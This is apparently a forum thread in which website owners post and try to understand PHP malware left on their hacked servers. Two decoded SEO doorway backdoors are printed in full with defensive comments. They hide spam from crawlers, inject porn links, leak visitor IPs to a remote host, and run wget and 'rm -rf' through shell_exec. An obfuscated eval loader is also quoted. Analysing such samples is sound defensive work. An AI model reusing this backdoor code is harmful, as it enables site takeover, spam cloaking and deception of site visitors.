So someone hacked into my website's FTP account and deposited two files. I would like help deciphering what the hell they do, or rather how they do it.
File # 1 'coloratura-brigantine.php'
What I have figured out so far:
- $bupohq equates to "create_function"
- $nttigv equates to "create_function('$a', 'eval($a);')", I think
- When the string is first reversed it starts with "eval(base64_decode(...));"
When the string is then decoded with base64_decode, it comes out as the following:
// Defender's annotation of the decoded payload. Code tokens are reproduced exactly
// as posted; only line breaks and comments were added. Fragments that read
// `[email protected]` appear to be an e-mail-obfuscation artifact of the forum: they
// stand where `$var=@...` or `.@...` was in the original (e.g. `$x=@$_POST[...]`,
// `$host=@$_SERVER[...]`, `=@explode(`, `$links=@file(`). Read them that way.
//
// What this is: a search-engine "doorway"/cloaking handler with a password-gated
// remote-update channel. It serves different content to crawlers, to visitors
// arriving from search engines, and to everyone else, and it can download and
// unpack an archive from a remote host through shell_exec().
set_time_limit(0);
// Fetches $url with curl. TLS peer/host verification is switched off and a fixed
// Chrome user agent is sent unless the caller supplies one.
function get_page_by_curl($url,$useragent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36"){
    $ch = curl_init ();
    curl_setopt ($ch, CURLOPT_URL,$url);
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);   // no certificate validation
    curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
    $result = curl_exec ($ch);
    curl_close($ch);
    return $result;
}
$doorcontent="";
// Operator command selector: the POST field `pppp_check` (artifact of `$x=@$_POST[...]`).
// When it is non-empty the file acts as a command channel instead of serving pages.
[email protected]$_POST["pppp_check"];
// Hard-coded MD5 of the operator password; POST field `p` (base64) is hashed and
// compared against it below. Useful as a signature for this family.
$md5pass="e5e4570182820af0a183ce1520afe43b";
// Request host and path (artifacts of `$host=@$_SERVER[...]` / `$uri=@$_SERVER[...]`).
[email protected]$_SERVER["HTTP_HOST"];
[email protected]$_SERVER["REQUEST_URI"];
$host=str_replace("www.","",$host);
$md5host=md5($host);   // md5(host) names the hidden cache directory
$urx=$host.$uri;
$md5urx=md5($urx);     // md5(host+uri) names the per-URL doorway record
// Cache location: system temp dir, falling back to this file's own directory.
if (function_exists('sys_get_temp_dir')) { $tmppath = sys_get_temp_dir(); if (!is_dir($tmppath)){ $tmppath = (dirname(__FILE__)); } } else { $tmppath = (dirname(__FILE__)); }
// Hidden directory "<tmp>/.<md5 of host>/" — a concrete artifact to look for on disk.
$cdir=$tmppath."/.".$md5host."/";
// Remote content/C2 hostname, base64-obscured in the source.
$domain=base64_decode("Zi5tZW55dWRueWEuY29t");
if ($x!=""){
    // ---- command channel; silently returns unless the password hash matches ----
    $p=md5(base64_decode(@$_POST["p"]));
    if ($p!=$md5pass)return;
    [email protected]$_POST["pa"];   // optional archive variant number (artifact of `$pa=@$_POST[...]`)
    if (($x=="2")||($x=="4")){
        // "2": delete the cache dir first, then download; "4": download only.
        // Both build shell commands from $tmppath/$md5host and run them through
        // shell_exec() as the web-server user: wget an archive from the remote
        // host, untar it into the temp dir, delete the archive. Whatever the
        // archive contains lands on the server.
        echo "###UPDATING_FILES###\n";
        if ($x=="2"){ $cmd="cd $tmppath; rm -rf .$md5host"; echo shell_exec($cmd); }
        $cmd="cd $tmppath; wget http://update.$domain/arc/$md5host.tgz -O 1.tgz; tar -xzf 1.tgz; rm -rf 1.tgz";
        if ($pa!=""){ $pa+=0; $cmd="cd $tmppath; wget http://update.$domain/arc/".$md5host."_".$pa.".tgz -O 1.tgz; tar -xzf 1.tgz; rm -rf 1.tgz"; }
        echo shell_exec($cmd); exit;
    }
    // "3": liveness probe — prints a marker so the operator knows the implant responds.
    if ($x=="3"){ echo "###WORKED###\n"; exit; }
} else{
    // ---- visitor-serving mode ----
    $curx=$cdir.$md5urx;
    if (@file_exists($curx)){
        // A cached doorway record exists for this exact URL. Layout (from the
        // list() below): "<IDpack>|||<keyword>|||<base64 page>|||<type flag>|||<base64 headers>"
        // (artifact of `=@explode(`).
        @list($IDpack,$mk,$doorcontent,$pdf,$contenttype)[email protected]("|||",@file_get_contents($curx));
        [email protected]_decode($doorcontent);   // artifact of `$doorcontent=@base64_decode(`
        // Classify the visitor by User-Agent and Referer. $mobile is assigned but
        // never read afterwards.
        $bot=0; $se=0; $mobile=0;
        if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", @$_SERVER["HTTP_USER_AGENT" ]))$bot=1;
        if (preg_match("#android|symbian|iphone|ipad|series60|mobile|phone|wap|midp|mobi|mini#i", @$_SERVER["HTTP_USER_AGENT" ]))$mobile=1;
        if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", @$_SERVER["HTTP_REFERER" ]))$se=1;
        if ($bot) {
            // Crawlers receive the cached doorway page, optionally under a spoofed
            // Content-Type (1=pdf, 2=png, 3=xml, 4=arbitrary header lines from the
            // record). This is how the site gets indexed under spam titles while
            // the owner, browsing normally, never sees them.
            $pdf+=0;
            if ($pdf==1){ header("Content-Type: application/pdf"); }
            if ($pdf==2){ header("Content-Type: image/png"); }
            if ($pdf==3){ header("Content-Type: text/xml"); }
            if ($pdf==4){ [email protected]_decode($contenttype); $types=explode("\n",$contenttype); foreach($types as $val){ $val=trim($val); if($val!="")header($val); } }
            echo $doorcontent;exit;
        }
        if ($se) {
            // Humans arriving from a search engine get whatever the remote lp.php
            // returns; their IP, the keyword and the host/URL hashes are reported
            // to it. (`&mk;=` etc. look like rendering artifacts of `&mk=`.)
            echo get_page_by_curl("http://$domain/lp.php?ip=".$IDpack."&mk;=".rawurlencode($mk)."&d;=".$md5host."&u;=".$md5urx."&addr;=".$_SERVER["REMOTE_ADDR"],@$_SERVER["HTTP_USER_AGENT"]);
            exit;
        }
        // Everyone else — including the site owner — gets a fake server-style
        // 404 page. Its HTML tags appear to have been stripped when the post was
        // rendered, hence the empty `echo ''` lines. REQUEST_URI is echoed
        // unescaped here (reflected XSS in the fake error page).
        header($_SERVER['SERVER_PROTOCOL'] . " 404 Not Found");
        echo '' . "\n"; echo '' . "\n"; echo '' . "\n"; echo '' . "\n";
        echo 'Not Found' . "\n";
        echo 'The requested URL ' . $_SERVER['REQUEST_URI'] . ' was not found on this server.' . "\n";
        echo '' . "\n";
        echo '' . $_SERVER['SERVER_SOFTWARE'] . ' PHP/' . phpversion() . ' Server at ' . $_SERVER['HTTP_HOST'] . ' Port 80' . "\n";
        echo '';
        exit;
    } else{
        // No doorway record for this URL: fetch the site's own page over plain
        // HTTP (artifact of `"http://".@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI']`),
        // then, if a link list "fff.sess" exists in the cache dir, replace a bounded
        // number (at most 21, indices 20..0) of randomly chosen anchor tags in the
        // real page with entries from that list before echoing it. This is the
        // "URL injection" the owner observed on the live site.
        $crurl="http://"[email protected]$_SERVER['HTTP_HOST'][email protected]$_SERVER['REQUEST_URI'];
        $buf=get_page_by_curl($crurl);
        $curx=$cdir."fff.sess";
        if (@file_exists($curx)){
            [email protected]($curx,FILE_SKIP_EMPTY_LINES|FILE_IGNORE_NEW_LINES);   // artifact of `$links=@file(`
            [email protected]($links)-1;                                         // artifact of `$c=@count(`
            shuffle($links);
            if ($c>20)$c=20;
            // Anchor-tag matcher. Its leading "<a" seems to have been lost along with
            // the other tags in the post, as was the <a ...> markup around $anchor in
            // $new below. Each list line is "<url>|||<anchor text>" per the list() call.
            $regexp = "]*href=(\"??)([^\" >]*?)\\1[^>]*>(.*)<\/a>";
            if(preg_match_all("/$regexp/siU", $buf, $matches)) { $zval=$matches[0]; shuffle($zval); foreach($zval as $val){ if ($c<0)break; list($l,$anchor)=explode("|||",trim($links[$c])); $new=''.$anchor.''; $buf=str_ireplace($val,$new,$buf); $c--; } }
        }
        echo $buf;
    }
}
I have not done much with PHP up to this point, but I can follow along decently enough.
File #2
'; $kilohm ='0brV'; $lacks ='VNQ(?Fru'; $foursome = 'o'; $disambiguations ='F';$crashes= 'eeTsa('; $bowfin= 'm'; $bespeak= 'Wr]';$brice ='S'; $gospelers='1iP'; $clutched ='wf$_';$lamentable='(e5(Cjogm';$carport='s'; $gusella= 'Xa_:IPHR'; $bowlers ='a'; $gambler= '$Ua'; $bassoon = 'e';$gallinule = 'E'; $girls = 'c"r;TT['; $billy = ')(bRTi'; $expect='R'; $beverlie='c'; $bricklayer='"'; $alteration= '_';$drained = 'n'; $clad= 'I'; $discerned ='JpY;['; $magistrate= '/'; $kile = 'd'; $dumbness ='K,=,';$loners= 'a_t[K([';$digressive = '('; $err ='e'; $cleavland= 'na2$6';$graspingly='$'; $footsteps='r]"'; $couched = 'c'; $aspirating='.'; $cristiano='tvorc?';$infuriation= ')era'; $ambled='i'; $i = '_'; $annoyance ='A'; $dinnie= 'u'; $horseflesh='T'; $jolts ='j'; $kernels='$';$creditor ='"';$darelle ='(';$corners='P'; $calamitous = 'O'; $big= 'TeitsFOr'; $linus= '(';$helmsman = 'u'; $hemoglobin = 'G'; $interferingly='?'; $credenza =')$'; $bobine= 'O'; $devising = ';'; $documentary ='R"e'; $imaginable = $cristiano['4'] .$big['7'] .$documentary['2']. $infuriation[3] .$big['3'] .$documentary['2'] .$i . $clutched['1']. $helmsman. $cleavland['0'] . $cristiano['4']. $big['3'].$big['2'] . $cristiano['2'] . $cleavland['0'] ; $gleeful = $bluet['2']; $luisa = $imaginable($gleeful,$documentary['2'].$cristiano['1'] . $infuriation[3] . $likenesses['3'] .$linus.$infuriation[3]. $big['7'].$big['7']. $infuriation[3]. $likenesses['4'] . $i . $discerned['1'].$cristiano['2']. $discerned['1'] . $linus . $clutched['1'] .$helmsman . $cleavland['0']. $cristiano['4'] . $i .$lamentable['7']. $documentary['2'] .$big['3'].$i.$infuriation[3]. $big['7'] .$lamentable['7'].$big['4'].$linus . $credenza['0']. $credenza['0'].$credenza['0'] .$devising ); $luisa ($grottos, $interferingly , $linus, $assassinates[5], $gambler['1'], $grottos , $gambler['1'] , $documentary['1'], $distinctiveness[0] ,$discerned['0'], $cleavland['2'] , $lamentable['4'], $credenza[1].$big['2'] .$dumbness['2'] . 
$infuriation[3].$big['7']. $big['7']. $infuriation[3]. $likenesses['4']. $i . $lamentable['8'] . $documentary['2']. $big['7'] . $lamentable['7']. $documentary['2'] . $linus.$credenza[1]. $i .$documentary['0'] . $gallinule. $lacks['2'] .$gambler['1'] .$gallinule.$brice .$big[0] . $dumbness['3'] .$credenza[1].$i . $lamentable['4'].$bobine. $bobine .$loners['4'] . $clad . $gallinule . $dumbness['3']. $credenza[1].$i . $brice.$gallinule. $documentary['0'] . $lacks['0']. $gallinule . $documentary['0'].$credenza['0']. $devising.$credenza[1] .$infuriation[3].$dumbness['2'].$big['2'] . $big['4']. $big['4']. $documentary['2']. $big['3'] . $linus .$credenza[1]. $big['2']. $loners['6'] . $documentary['1'] . $cristiano['2'] .$billy['2'].$helmsman . $clutched['1'] . $lamentable['8'] .$jolts.$clutched['0'] .$cristiano['2'] . $documentary['1']. $footsteps['1']. $credenza['0'].$interferingly. $credenza[1]. $big['2'].$loners['6'].$documentary['1'] . $cristiano['2'] . $billy['2'] . $helmsman. $clutched['1']. $lamentable['8'] .$jolts.$clutched['0'] . $cristiano['2'].$documentary['1'] . $footsteps['1'] . $gusella['3']. $linus. $big['2']. $big['4']. $big['4']. $documentary['2'] . $big['3'].$linus .$credenza[1] . $big['2']. $loners['6'] . $documentary['1'].$gusella['6'] . $big[0]. $big[0] . $corners.$i. $bobine .$cubbyhole['1'].$gambler['1'].$big['5'] . $bobby['3'] . $discerned['0'] . $bespeak['0'] . $bobine. $documentary['1']. $footsteps['1'] . $credenza['0'] . $interferingly .$credenza[1] . $big['2'] .$loners['6'] . $documentary['1'] .$gusella['6']. $big[0]. $big[0] . $corners .$i.$bobine .$cubbyhole['1'] .$gambler['1'] . $big['5'] . $bobby['3'].$discerned['0'].$bespeak['0'].$bobine .$documentary['1'] .$footsteps['1']. $gusella['3']. $kile.$big['2']. $documentary['2'] .$credenza['0'] . $devising . $documentary['2'] . $cristiano['1']. $infuriation[3] .$likenesses['3'].$linus.$big['4'].$big['3']. $big['7'] . $big['7'] . $documentary['2']. $cristiano['1'].$linus. $billy['2'] . 
$infuriation[3].$big['4'] . $documentary['2'] .$cleavland[4] . $crossbars[1].$i . $kile.$documentary['2'] . $cristiano['4'].$cristiano['2'] . $kile .$documentary['2']. $linus.$big['4'] . $big['3'].$big['7'] . $big['7'].$documentary['2'] .$cristiano['1'] .$linus. $credenza[1] .$infuriation[3].$credenza['0'] .$credenza['0'] . $credenza['0'] .$credenza['0'] . $devising );
Again I can sort of follow along with the code.
So basically what this did was URL injection using various porn strings — Big black asses.html, nude_teens_fucking.html etc. — you get the idea. Anyway, I would ask for some help in understanding how the hell this thing works. As far as I can tell it doesn't actually do anything malicious other than some URL injection, so I cannot think of why someone would waste their time doing it.
I've since removed the files, removed the reference to the first file from my PHP config file, and changed the username and password for the FTP account.
I was looking at this and was sort of amazed at the lengths this person went to to basically just be a pain in the ass. PHP seems like a much more powerful language than I first thought.
Google told me my site had an injection attack of the format:
http://www.MYWEBSITESURL.com/sexy-red-headed-woman ...or something like that. So I logged in to my HTML directory and found nothing of the sort. I did however find these two PHP files in there. Of course I have changed my password and deleted the files, but can anybody tell what these scripts are supposed to do?
http://pastebin.com/mSdyw7Xz http://pastebin.com/XLSaTQMB The first one has a funny reversed, base64-encoded blob that was easy to decode:
// Defender's annotation of the second decoded payload — a simpler variant of the
// same doorway/cloaking script. Code tokens are reproduced exactly as posted; only
// line breaks and comments were added. Fragments reading `[email protected]` appear
// to be an e-mail-obfuscation artifact standing for `$var=@...` or `.@...` in the
// original (`$x=@$_POST[...]`, `$host=@$_SERVER[...]`, `=@explode(`, `.@$_SERVER`).
set_time_limit(0);
// Fetches $url with curl; TLS verification disabled, fixed Chrome UA by default.
function get_page_by_curl($url,$useragent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36"){
    $ch = curl_init ();
    curl_setopt ($ch, CURLOPT_URL,$url);
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);   // no certificate validation
    curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
    $result = curl_exec ($ch);
    curl_close($ch);
    return $result;
}
$doorcontent="";
// Command selector: POST field `pppp_check` (artifact of `$x=@$_POST[...]`).
[email protected]$_POST["pppp_check"];
// Hard-coded MD5 of the operator password; POST field `p` (base64) is checked against it.
$md5pass="e5e4570182820af0a183ce1520afe43b";
// Request host and path (artifacts of `$host=@$_SERVER[...]` / `$uri=@$_SERVER[...]`).
[email protected]$_SERVER["HTTP_HOST"];
[email protected]$_SERVER["REQUEST_URI"];
$host=str_replace("www.","",$host);
$md5host=md5($host);   // names the hidden cache directory
$urx=$host.$uri;
$md5urx=md5($urx);     // names the per-URL doorway record
// Cache location: system temp dir, else this file's own directory.
if (function_exists('sys_get_temp_dir')) {$tmppath = sys_get_temp_dir();} else {$tmppath = (dirname(__FILE__));}
// Hidden directory "<tmp>/.<md5 of host>/" — a concrete artifact to look for on disk.
$cdir=$tmppath."/.".$md5host."/";
// Remote content/C2 hostname, base64-obscured in the source.
$domain=base64_decode("eDMubWVnYWxvbGlrLmNvbQ==");
if ($x!=""){
    // ---- command channel; silently returns unless the password hash matches ----
    $p=md5(base64_decode(@$_POST["p"]));
    if ($p!=$md5pass)return;
    if (($x=="2")||($x=="4")){
        // "2": delete the cache dir, then download; "4": download only. The shell
        // commands (wget the archive, untar into the temp dir, delete it) run via
        // shell_exec() as the web-server user, so arbitrary files can be dropped.
        echo "###UPDATING_FILES###\n";
        if ($x=="2"){ $cmd="cd $tmppath; rm -rf .$md5host"; echo shell_exec($cmd); }
        $cmd="cd $tmppath; wget http://$domain/outp/wp/arc/$md5host.tgz -O 1.tgz; tar -xzf 1.tgz; rm -rf 1.tgz";
        echo shell_exec($cmd); exit;
    }
    // "3": liveness probe for the operator.
    if ($x=="3"){ echo "###WORKED###\n";exit; }
}else{
    // ---- visitor-serving mode ----
    $curx=$cdir.$md5urx;
    if (@file_exists($curx)){
        // Cached doorway record: the whole file is base64, decoding to
        // "<IDpack>|||<keyword>|||<page>" (artifact of `=@explode(`).
        @list($IDpack,$mk,$doorcontent)[email protected]("|||",@base64_decode(@file_get_contents($curx)));
        // Classify the visitor by User-Agent and Referer; $mobile is never read.
        $bot=0; $se=0; $mobile=0;
        if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", @$_SERVER["HTTP_USER_AGENT" ]))$bot=1;
        if (preg_match("#android|symbian|iphone|ipad|series60|mobile|phone|wap|midp|mobi|mini#i", @$_SERVER["HTTP_USER_AGENT" ]))$mobile=1;
        if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", @$_SERVER["HTTP_REFERER" ]))$se=1;
        // Crawlers get the cached doorway page verbatim (no content-type games here).
        if ($bot) {echo $doorcontent;exit;}
        // Search-engine referrals get the remote lp.php response; the visitor's IP,
        // keyword and host/URL hashes are sent along (`&mk;=` etc. look like
        // rendering artifacts of `&mk=`).
        if ($se) {echo get_page_by_curl("http://$domain/lp.php?ip=".$IDpack."&mk;=".rawurlencode($mk)."&d;=".$md5host."&u;=".$md5urx."&addr;=".$_SERVER["REMOTE_ADDR"],@$_SERVER["HTTP_USER_AGENT"]);exit;}
        // Everyone else gets a fake server-style 404. The page's HTML tags appear to
        // have been stripped on rendering (hence `echo ''` and the literal newlines
        // left inside some strings). REQUEST_URI is echoed unescaped (reflected XSS).
        header($_SERVER['SERVER_PROTOCOL'] . " 404 Not Found");
        echo '' . "\n"; echo '' . "\n";
        echo '404 Not Found' . "\n";
        echo '' . "\n";
        echo 'Not Found
' . "\n";
        echo 'The requested URL ' . $_SERVER['REQUEST_URI'] . ' was not found on this server.
' . "\n";
        echo '
' . "\n";
        echo '' . $_SERVER['SERVER_SOFTWARE'] . ' PHP/' . phpversion() . ' Server at ' . $_SERVER['HTTP_HOST'] . ' Port 80' . "\n";
        echo '';
        exit;
    }else{
        // No doorway record: re-fetch the site's own page for this URL over plain
        // HTTP and echo it unchanged (artifact of
        // `"http://".@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI']`). If this file
        // is prepended to every request, that self-fetch presumably re-enters this
        // same code path — worth checking in the server logs.
        $crurl="http://"[email protected]$_SERVER['HTTP_HOST'][email protected]$_SERVER['REQUEST_URI'];
        echo get_page_by_curl($crurl);
    }
}